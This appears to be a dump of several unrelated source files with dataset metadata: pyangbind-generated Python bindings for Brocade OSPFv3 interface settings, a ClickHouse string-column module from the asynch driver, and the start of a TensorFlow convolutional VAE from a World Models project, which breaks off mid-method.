method. Backends looking to populate this variable should
do so via calling thisObj._set_passive() directly.
YANG Description: When you configure an OSPF interface to be passive, that interface does not send or receive OSPF route updates. This option affects all IPv6 subnets configured on the interface.By default, all OSPF interfaces are active and thus can send and receive OSPF route information. Since a passive interface does not send or receive route information, the interface is in effect a stub network.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """passive must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__passive = t
if hasattr(self, '_set'):
self._set()
def _unset_passive(self):
self.__passive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="passive", rest_name="passive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Passive information'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_bfd(self):
"""
Getter method for bfd, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/bfd (container)
YANG Description: Set Bidirectional Forwarding Detection operation mode on this interface
"""
return self.__bfd
def _set_bfd(self, v, load=False):
"""
Setter method for bfd, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/bfd (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_bfd is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_bfd() directly.
YANG Description: Set Bidirectional Forwarding Detection operation mode on this interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """bfd must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__bfd = t
if hasattr(self, '_set'):
self._set()
def _unset_bfd(self):
self.__bfd = YANGDynClass(base=bfd.bfd, is_container='container', presence=False, yang_name="bfd", rest_name="bfd", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set BFD operation mode on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
def _get_cost(self):
"""
Getter method for cost, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/cost (uint32)
YANG Description: The overhead required (cost) to send a packet across this interface
"""
return self.__cost
def _set_cost(self, v, load=False):
"""
Setter method for cost, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/cost (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_cost is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_cost() directly.
YANG Description: The overhead required (cost) to send a packet across this interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """cost must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)""",
})
self.__cost = t
if hasattr(self, '_set'):
self._set()
def _unset_cost(self):
self.__cost = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..65535']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(1), is_leaf=True, yang_name="cost", rest_name="cost", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface cost', u'cli-trim-default': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
def _get_instance(self):
"""
Getter method for instance, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/instance (uint32)
YANG Description: Instance indicates the number of OSPFv3 instances running on this interface.The default is 0.
"""
return self.__instance
def _set_instance(self, v, load=False):
"""
Setter method for instance, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/instance (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_instance is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_instance() directly.
YANG Description: Instance indicates the number of OSPFv3 instances running on this interface.The default is 0.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """instance must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)""",
})
self.__instance = t
if hasattr(self, '_set'):
self._set()
def _unset_instance(self):
self.__instance = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), default=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32)(0), is_leaf=True, yang_name="instance", rest_name="instance", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Instance of OSPFv3 protocol on this interface'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
def _get_mtu_ignore(self):
"""
Getter method for mtu_ignore, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/mtu_ignore (empty)
YANG Description: To disable a check that verifies the same MTU is used on the interfaceshared by neighbors.By default, the mismatch detection is enabled.
"""
return self.__mtu_ignore
def _set_mtu_ignore(self, v, load=False):
"""
Setter method for mtu_ignore, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/mtu_ignore (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_mtu_ignore is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_mtu_ignore() directly.
YANG Description: To disable a check that verifies the same MTU is used on the interfaceshared by neighbors.By default, the mismatch detection is enabled.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """mtu_ignore must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__mtu_ignore = t
if hasattr(self, '_set'):
self._set()
def _unset_mtu_ignore(self):
self.__mtu_ignore = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="mtu-ignore", rest_name="mtu-ignore", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'To disable OSPFv3 MTU mismatch detection'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_network(self):
"""
Getter method for network, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/network (enumeration)
YANG Description: To configure the OSPF network type.The default setting of the parameter depends on the network type.
"""
return self.__network
def _set_network(self, v, load=False):
"""
Setter method for network, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/network (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_network is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_network() directly.
YANG Description: To configure the OSPF network type.The default setting of the parameter depends on the network type.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """network must be of a type compatible with enumeration""",
'defined-type': "brocade-ospfv3:enumeration",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)""",
})
self.__network = t
if hasattr(self, '_set'):
self._set()
def _unset_network(self):
self.__network = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'broadcast': {'value': 1}, u'point-to-point': {'value': 2}},), is_leaf=True, yang_name="network", rest_name="network", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface type'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='enumeration', is_config=True)
def _get_priority(self):
"""
Getter method for priority, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/priority (uint32)
YANG Description: To modify the priority of an OSPF router. The value can be from 0-255.The priority is used when selecting the designated router (DR) and backup designated routers (BDRs). Default is 1If the priority is set to 0, the router does not participate in DR and BDR election.
"""
return self.__priority
def _set_priority(self, v, load=False):
"""
Setter method for priority, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/priority (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_priority is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_priority() directly.
YANG Description: To modify the priority of an OSPF router. The value can be from 0-255.The priority is used when selecting the designated router (DR) and backup designated routers (BDRs). Default is 1If the priority is set to 0, the router does not participate in DR and BDR election.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """priority must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)""",
})
self.__priority = t
if hasattr(self, '_set'):
self._set()
def _unset_priority(self):
self.__priority = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..255']}), is_leaf=True, yang_name="priority", rest_name="priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Interface priority'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='uint32', is_config=True)
def _get_suppress_linklsa(self):
"""
Getter method for suppress_linklsa, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/suppress_linklsa (empty)
YANG Description: Suppress link LSA advertisements
"""
return self.__suppress_linklsa
def _set_suppress_linklsa(self, v, load=False):
"""
Setter method for suppress_linklsa, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/suppress_linklsa (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_suppress_linklsa is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_suppress_linklsa() directly.
YANG Description: Suppress link LSA advertisements
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """suppress_linklsa must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)""",
})
self.__suppress_linklsa = t
if hasattr(self, '_set'):
self._set()
def _unset_suppress_linklsa(self):
self.__suppress_linklsa = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="suppress-linklsa", rest_name="suppress-linklsa", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Suppress link LSA advertisements'}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='empty', is_config=True)
def _get_authentication(self):
"""
Getter method for authentication, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/authentication (container)
YANG Description: Configure ipsec authentication for the interface.The interface IPsec configuration takes precedence over the area IPsec configuration when an area and an interface within that area use IPsec. Therefore, if you configure IPsec for an interface and an area configuration also exists that includes this interface, the interface's IPsec configuration is used by that interface. However, if you disable IPsec on an interface, IPsec is disabled on the interface even if the interface has its own, specific authentication.
"""
return self.__authentication
def _set_authentication(self, v, load=False):
"""
Setter method for authentication, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/authentication (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_authentication is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_authentication() directly.
YANG Description: Configure ipsec authentication for the interface.The interface IPsec configuration takes precedence over the area IPsec configuration when an area and an interface within that area use IPsec. Therefore, if you configure IPsec for an interface and an area configuration also exists that includes this interface, the interface's IPsec configuration is used by that interface. However, if you disable IPsec on an interface, IPsec is disabled on the interface even if the interface has its own, specific authentication.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """authentication must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__authentication = t
if hasattr(self, '_set'):
self._set()
def _unset_authentication(self):
self.__authentication = YANGDynClass(base=authentication.authentication, is_container='container', presence=False, yang_name="authentication", rest_name="authentication", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure authentication for the interface', u'cli-incomplete-no': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
def _get_link_interval_properties(self):
"""
Getter method for link_interval_properties, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/link_interval_properties (container)
"""
return self.__link_interval_properties
def _set_link_interval_properties(self, v, load=False):
"""
Setter method for link_interval_properties, mapped from YANG variable /interface/port_channel/ipv6/interface_ospfv3_conf/link_interval_properties (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_link_interval_properties is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_link_interval_properties() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """link_interval_properties must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)""",
})
self.__link_interval_properties = t
if hasattr(self, '_set'):
self._set()
def _unset_link_interval_properties(self):
self.__link_interval_properties = YANGDynClass(base=link_interval_properties.link_interval_properties, is_container='container', presence=False, yang_name="link-interval-properties", rest_name="", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-drop-node-name': None}}, namespace='urn:brocade.com:mgmt:brocade-ospfv3', defining_module='brocade-ospfv3', yang_type='container', is_config=True)
interface_area = __builtin__.property(_get_interface_area, _set_interface_area)
active = __builtin__.property(_get_active, _set_active)
passive = __builtin__.property(_get_passive, _set_passive)
bfd = __builtin__.property(_get_bfd, _set_bfd)
cost = __builtin__.property(_get_cost, _set_cost)
instance = __builtin__.property(_get_instance, _set_instance)
mtu_ignore = __builtin__.property(_get_mtu_ignore, _set_mtu_ignore)
network = __builtin__.property(_get_network, _set_network)
priority = __builtin__.property(_get_priority, _set_priority)
suppress_linklsa = __builtin__.property(_get_suppress_linklsa, _set_suppress_linklsa)
authentication = __builtin__.property(_get_authentication, _set_authentication)
link_interval_properties = __builtin__.property(_get_link_interval_properties, _set_link_interval_properties)
_pyangbind_elements = {'interface_area': interface_area, 'active': active, 'passive': passive, 'bfd': bfd, 'cost': cost, 'instance': instance, 'mtu_ignore': mtu_ignore, 'network': network, 'priority': priority, 'suppress_linklsa': suppress_linklsa, 'authentication': authentication, 'link_interval_properties': link_interval_properties, }
|
[
"badaniya@brocade.com"
] |
badaniya@brocade.com
|
3915c6d17b22908a6dfe692f793c1eeb5ce13805
|
b4cf3c5caacd99d0fb0b864f4ee9f30056a52c05
|
/asynch/proto/columns/stringcolumn.py
|
a130c47f735e4a72d15f01aaf56f509c4e6b9b2c
|
[
"Apache-2.0"
] |
permissive
|
dbrojas/asynch
|
4376ca20e15897e0efe4345402d5d5af3a7c1212
|
94054ba4acb9f0d05ddedf5ae66278b5e5301fdd
|
refs/heads/master
| 2023-03-12T03:24:42.176643
| 2021-02-24T02:18:11
| 2021-02-24T02:18:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,469
|
py
|
from asynch.proto.columns.base import Column
from asynch.proto.io import BufferedReader, BufferedWriter
from asynch.proto.utils import compat
class String(Column):
ch_type = "String"
py_types = compat.string_types
null_value = ""
async def write_items(
self, items,
):
await self.writer.write_strings(items)
async def read_items(
self, n_items,
):
ret = []
for _ in range(n_items):
ret.append(await self.reader.read_str())
return tuple(ret)
class ByteString(String):
py_types = (bytes,)
null_value = b""
class FixedString(String):
ch_type = "FixedString"
def __init__(self, reader: BufferedReader, writer: BufferedWriter, length: int, **kwargs):
self.length = length
super().__init__(reader, writer, **kwargs)
class ByteFixedString(FixedString):
py_types = (bytearray, bytes)
null_value = b""
async def write_items(
self, items,
):
for item in items:
await self.writer.write_bytes(item)
def create_string_column(spec, column_options):
client_settings = column_options["context"].client_settings
strings_as_bytes = client_settings["strings_as_bytes"]
if spec == "String":
cls = ByteString if strings_as_bytes else String
return cls(**column_options)
else:
cls = ByteFixedString if strings_as_bytes else FixedString
return cls(**column_options)
|
[
"long2ice@gmail.com"
] |
long2ice@gmail.com
|
74c123cca695e381f9917d8e47a426e387ac6de1
|
e2a2d471aeedf71d688e61689237b8cbea4997bf
|
/vae/vae.py
|
d3149c2b62ff1dadfdb0b0dec57f9abed1e723f0
|
[] |
no_license
|
Shadek07/WorldModel_VisualPushBlock
|
7ba03503f5c1d6f1eae7c4516e90d325e1a28f42
|
a12c13a0938aaa1ac6054f9f051848f1bf114f4d
|
refs/heads/master
| 2020-07-12T11:58:33.297560
| 2019-09-03T15:51:38
| 2019-09-03T15:51:38
| 204,815,078
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,747
|
py
|
# ConvVAE model
import numpy as np
import json
import tensorflow as tf
import os
import constants
from constants import IMAGE_H, IMAGE_W
from constants import SCREEN_Y, SCREEN_X
import pickle
import base64
def reset_graph():
if 'sess' in globals() and sess:
sess.close()
tf.reset_default_graph()
class ConvVAE(object):
def __init__(self, z_size=64, batch_size=1, learning_rate=0.0001, kl_tolerance=0.5, is_training=False, reuse=False, gpu_mode=False):
self.z_size = z_size
self.batch_size = batch_size
self.learning_rate = learning_rate
self.is_training = is_training
self.kl_tolerance = kl_tolerance
self.reuse = reuse
with tf.variable_scope('conv_vae', reuse=self.reuse):
if not gpu_mode:
with tf.device('/cpu:0'):
tf.logging.info('Model using cpu.')
print('called build_graph')
self._build_graph()
else:
tf.logging.info('Model using gpu.')
self._build_graph()
self._init_session()
def _build_graph(self):
self.g = tf.Graph()
with self.g.as_default():
self.x = tf.placeholder(tf.float32, shape=[None, IMAGE_W, IMAGE_H, 3])
#print('inside build graph')
# Encoder
h = tf.layers.conv2d(self.x, 32, 4, strides=2, activation=tf.nn.relu, name="enc_conv1")
#print('h32',h.shape)
h = tf.layers.conv2d(h, 64, 4, strides=2, activation=tf.nn.relu, name="enc_conv2")
#print('h64', h.shape)
h = tf.layers.conv2d(h, 128, 4, strides=2, activation=tf.nn.relu, name="enc_conv3")
#print('h128', h.shape)
h = tf.layers.conv2d(h, 256, 4, strides=2, activation=tf.nn.relu, name="enc_conv4")
#print('h256', h.shape)
#print('shpae',h.shape)
h = tf.reshape(h, [-1, 2*2*256]) #tf.reshape(h, [-1, 2*2*256]) #CHANGE here
#print('h_reshape', h.shape)
#InvalidArgumentError (see above for traceback): Input to reshape is a tensor with 2304 values, but the requested shape requires a multiple of 1024
# VAE
self.mu = tf.layers.dense(h, self.z_size, name="enc_fc_mu")
#print('mu:', self.mu.shape)
self.logvar = tf.layers.dense(h, self.z_size, name="enc_fc_log_var")
self.sigma = tf.exp(self.logvar / 2.0)
self.epsilon = tf.random_normal([self.batch_size, self.z_size])
self.z = self.mu + self.sigma * self.epsilon
#print('z:', self.z.shape)
# Decoder
h = tf.layers.dense(self.z, 4*256, name="dec_fc")
h = tf.reshape(h, [-1, 1, 1, 4*256])
#print('h_reshape', h.shape)
h = tf.layers.conv2d_transpose(h, 128, 5, strides=2, activation=tf.nn.relu, name="dec_deconv1")
#print('h128', h.shape)
h = tf.layers.conv2d_transpose(h, 64, 5, strides=2, activation=tf.nn.relu, name="dec_deconv2")
#print('h84', h.shape)
h = tf.layers.conv2d_transpose(h, 32, 6, strides=2, activation=tf.nn.relu, name="dec_deconv3")
#print('h32', h.shape)
self.y = tf.layers.conv2d_transpose(h, 3, 6, strides=2, activation=tf.nn.sigmoid, name="dec_deconv4")
#print('y: ', self.y.shape)
# train ops
if self.is_training:
self.global_step = tf.Variable(0, name='global_step', trainable=False)
eps = 1e-6 # avoid taking log of zero
# reconstruction loss
self.r_loss = tf.reduce_sum(
tf.square(self.x - self.y),
reduction_indices = [1,2,3]
)
self.r_loss = tf.reduce_mean(self.r_loss)
# augmented kl loss per dim
self.kl_loss = - 0.5 * tf.reduce_sum(
(1 + self.logvar - tf.square(self.mu) - tf.exp(self.logvar)),
reduction_indices = 1
)
self.kl_loss = tf.maximum(self.kl_loss, self.kl_tolerance * self.z_size)
print('kl_loss dim', self.kl_loss.shape)
self.kl_loss = tf.reduce_mean(self.kl_loss)
self.loss = self.r_loss + self.kl_loss
# training
self.lr = tf.Variable(self.learning_rate, trainable=False)
self.optimizer = tf.train.AdamOptimizer(self.lr)
grads = self.optimizer.compute_gradients(self.loss) # can potentially clip gradients here.
self.train_op = self.optimizer.apply_gradients(
grads, global_step=self.global_step, name='train_step')
# initialize vars
self.init = tf.global_variables_initializer()
t_vars = tf.trainable_variables()
self.assign_ops = {}
for var in t_vars:
#if var.name.startswith('conv_vae'):
pshape = var.get_shape()
pl = tf.placeholder(tf.float32, pshape, var.name[:-2]+'_placeholder')
assign_op = var.assign(pl)
self.assign_ops[var] = (assign_op, pl)
def _init_session(self):
"""Launch TensorFlow session and initialize variables"""
self.sess = tf.Session(graph=self.g)
self.sess.run(self.init)
def close_sess(self):
""" Close TensorFlow session """
self.sess.close()
def encode(self, x):
return self.sess.run(self.z, feed_dict={self.x: x})
def encode_mu_logvar(self, x):
